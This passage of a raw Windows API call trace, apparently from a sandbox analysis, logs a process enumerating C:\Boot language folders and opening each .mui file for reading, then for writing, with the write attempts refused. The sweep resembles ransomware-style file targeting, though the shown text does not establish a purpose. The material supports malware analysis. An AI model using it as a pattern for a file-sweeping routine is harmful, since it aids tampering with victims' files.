hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0082.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0082.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0082.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.794] AreFileApisANSI () returned 1 [0082.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\de-DE\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\de-DE\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0082.794] AreFileApisANSI () returned 1 [0082.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0082.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\de-DE\\memtest.exe.mui") returned 30 [0082.794] CreateFileW (lpFileName="C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.794] GetFileType (hFile=0x430) returned 0x1 [0082.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.795] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.795] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.795] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.795] CloseHandle (hObject=0x430) returned 1 [0082.795] AreFileApisANSI () returned 1 [0082.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0082.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\de-DE\\memtest.exe.mui") returned 30 [0082.795] CreateFileW (lpFileName="C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.795] GetLastError () returned 0x5 [0082.795] GetLastError () returned 0x5 [0082.795] SetLastError (dwErrCode=0x5) [0082.796] GetLastError () returned 0x5 [0082.796] SetLastError (dwErrCode=0x5) [0082.796] GetLastError () returned 0x5 [0082.796] SetLastError (dwErrCode=0x5) [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.796] FindNextFileW (in: hFindFile=0x78190, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧뎠")) returned 0 [0082.796] FindClose (in: hFindFile=0x78190 | out: hFindFile=0x78190) returned 1 [0082.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0082.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0082.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.797] AreFileApisANSI () returned 1 [0082.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\el-GR", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\el-GR", lpUsedDefaultChar=0x0) returned 14 [0082.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0082.797] AreFileApisANSI () returned 1 [0082.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0082.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\el-GR") returned 14 [0082.797] CreateFileW (lpFileName="C:\\Boot\\el-GR" (normalized: "c:\\boot\\el-gr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.797] GetLastError () returned 0x5 [0082.797] GetLastError () returned 0x5 [0082.797] SetLastError (dwErrCode=0x5) [0082.797] GetLastError () returned 0x5 [0082.797] SetLastError (dwErrCode=0x5) [0082.797] GetLastError () returned 0x5 [0082.797] SetLastError (dwErrCode=0x5) [0082.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.798] AreFileApisANSI () returned 1 [0082.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0082.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\el-GR") returned 14 [0082.798] CreateFileW (lpFileName="C:\\Boot\\el-GR" (normalized: "c:\\boot\\el-gr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.798] GetLastError () returned 0x5 [0082.798] GetLastError () returned 0x5 [0082.798] SetLastError (dwErrCode=0x5) [0082.798] GetLastError () returned 0x5 [0082.798] SetLastError (dwErrCode=0x5) [0082.798] GetLastError () returned 0x5 [0082.798] SetLastError (dwErrCode=0x5) [0082.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.798] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0082.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0082.798] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="en-GB", cAlternateFileName="")) returned 1 [0082.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0082.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.799] FindFirstFileExW (in: lpFileName="C:\\Boot\\el-GR\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78210 [0082.799] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.799] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0082.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0082.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.800] AreFileApisANSI () returned 1 [0082.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\el-GR\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0082.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.800] AreFileApisANSI () returned 1 [0082.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0082.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 30 [0082.800] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.801] GetFileType (hFile=0x430) returned 0x1 [0082.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0082.801] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.801] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.801] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.801] CloseHandle (hObject=0x430) returned 1 [0082.801] AreFileApisANSI () returned 1 [0082.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0082.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 30 [0082.801] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.802] GetLastError () returned 0x5 [0082.802] GetLastError () returned 0x5 [0082.802] SetLastError (dwErrCode=0x5) [0082.802] GetLastError () returned 0x5 [0082.802] SetLastError (dwErrCode=0x5) [0082.802] GetLastError () returned 0x5 [0082.802] SetLastError (dwErrCode=0x5) [0082.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.802] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.802] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, 